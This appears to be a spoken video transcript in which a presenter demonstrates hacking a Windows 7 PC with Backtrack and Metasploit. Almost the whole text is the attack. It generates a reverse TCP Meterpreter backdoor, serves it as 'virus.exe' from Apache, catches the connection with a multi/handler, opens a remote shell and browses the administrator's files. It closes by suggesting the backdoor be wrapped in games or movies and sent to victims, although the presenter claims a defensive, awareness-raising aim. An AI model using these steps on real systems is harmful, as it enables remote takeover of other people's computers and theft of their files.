Hi, my name is Erdal Ozkaya. In this presentation, I'm going to use Backtrack to hack Windows 7. Again, for this demonstration, you need Backtrack to run some exploration tools, network exploration tools, and Metasploit. Please go ahead and launch MSF console. This should load up Metasploit for us. We're just typing the command MSF payload space Windows Metaprinter reverse TCP LH host the IP address of your victim PC. Here's my victim PC. Not this one, sorry. That one. As you can see, the IP address is .7. Back to my Backtrack PC. All what I've done is put the IP address. We're creating a reverse TCP Metaprinter, and we just saved it in desktop. It did create the payload for us in a reverse TCP. That's the length, and it is going to work with this host. Now, for this step, I don't want you to get confused. Usually, a hacker will create a virus and he or she will share it in the internet. But as I don't have the time and option to do so, what I'm going to do is I'm gonna share my virus into a folder. And to do so, I'm using my folder creation tools, which is mkdir variable yeah, I misspelled it. Variable www, and it's a share. Just press enter. Yeah, I did done it before. The share is existing, no problem. What we're going to do is now we're going to change the mode for the share folder to 775. To be able to do that, all what you have to do is type ch mode -r 755 variable www share, and it will change the mode for the share. Now we're gonna change the ownership. To do so, you have to type just ch own -r www data variable, just variable www and share. The share now, the ownership of the share has changed. It's time now to type this command. Variable www grab share. There we go. I can see my mistake. It's 3. Beautiful. What we done is we just went to the share. We done the grab share, so it's ready for us to start. All we have to do is now in Apache start the Apache server. To do so, Apache service actually. All what you have to do is type service Apache to start. Beautiful. Apache is running. All good. It's now time to copy our virus into the share. To do so, we're going to cp. Hold on, sorry, didn't work out. cp again root desktop and virus.exe. We have to copy it to the variable www share. Beautiful. It looks all good. Now we're going to our Windows 7 PC. I'm opening my internet browser, typing my IP address 1010.9 share, and you will see my virus.exe is there. That's the IP address of my backtrack. To find the IP address, all what you have to do is type ifconfig. So if you type ifconfig, it should give you the IP address. Back to my Windows 7. Let me download my little virus into the desktop. As I said, in real life, it's not done this way. Alright, it should just copy it to the desktop. And here we are. While this is copying to the desktop, let's go back to our backtrack PC and let's start to use. We know now the user has downloaded it. It's sitting there embedded to his MP3 to program or anything else. You know, you can track your downloads. Just use exploit multi handler. Enter. Now this will take us inside the handler. We are going to set the handler by typing set payload. It's a Windows PC. It's a meter preter, and if you remember, it was a reverse underscore TCP. Beautiful. Now we are going to set the local IP address that will catch the reverse connection. At the moment, as soon as they double click on it, it's gonna send some connection, but we need to catch it, right? And as you remember, my IP address on my backtrack was right here in my internet browser. Oh, look. Yeah, they couldn't verify, which is good. .9. So go back here. We are going to set the localhost. Set the host to 10.10.10.6. I mean the IP address is not 69, sorry. Just press enter. And now we did also set it up. Now we need to start the handler. To do so, let's go back. Before we go back to Windows 7, let's start the exploit. Exploit J Z. It should start the exploit. Here we go. The payload is starting. It should also start the payload handler as well. It did, sorry. And here we go. The IP address is here, 4444. Let's move back to my Windows 7 PC. Now my victim can click into the link. Of course, in real life, these things are, hopefully they are not gonna click that little virus. I did. Let's see what's gonna happen. I mean, nothing is happening, as you can see. Double clicking, running twice. I can just do a netstate command. net state and comment, and you will see probably that some activity is happening from the virus. Let's refresh it. We know it's port 44444. We can't see anything at the moment. Here it is. 10.10.7, and it started to send some sync messages. So let's go back to our backtrack. Or with the new name Kali Linux, and you will see that connection has started to appear. We can now interact with the session. To be able to interact with the session, all what you have to do is go to sessions -I think it's session 1. What is the session ID? Session 2. So let me figure out the session ID. 1 second. Alright, let's start Metasploit again. Let's close the terminal. Run Metasploit again. As you can see, the interaction has started now. So we can just type shell here to be able to connect to the Windows desktop. And here we are. At the moment we are inside the Windows desktop. That's a version of the Windows. That's the channel which has been created, and I have at the moment a backdoor running from here to the Windows 7 PC. What can we do with this? Let's say we can just type dir and start to look of the content. We can just go to, out of CD, we can just go to C drive, for example. Actually, one more time CD. Now, if we do dir, we are fully looking into the C drives. We can always go to CD, users, and this is the whole user access. Let's go to administrator. There, and this is all the admin files. As you can see, I just used a basic backdoor virus. I did put it in the desktop. The hard part probably for you was to share it from Backtrack, but as I said, all what you have to do is get this backdoor, embed it with a program wrapper, make sure you embed it into a game, a movie, and then send it to a victim. Now, I am in the good side, and what I'm trying to show here is hackers, bad guys, script kiddies, they are using this method to give you their viruses. Then they share it in some sort of websites. Here's an example. Let's say free Windows 8 download. And as soon as I press that, you will see that there are so many websites or underground download. I know I spelled it wrong, but you can just go and download the games for free, for example, and I can assure you most of them have the virus embedded. I hope you enjoyed the presentation. Thank you very much for watching.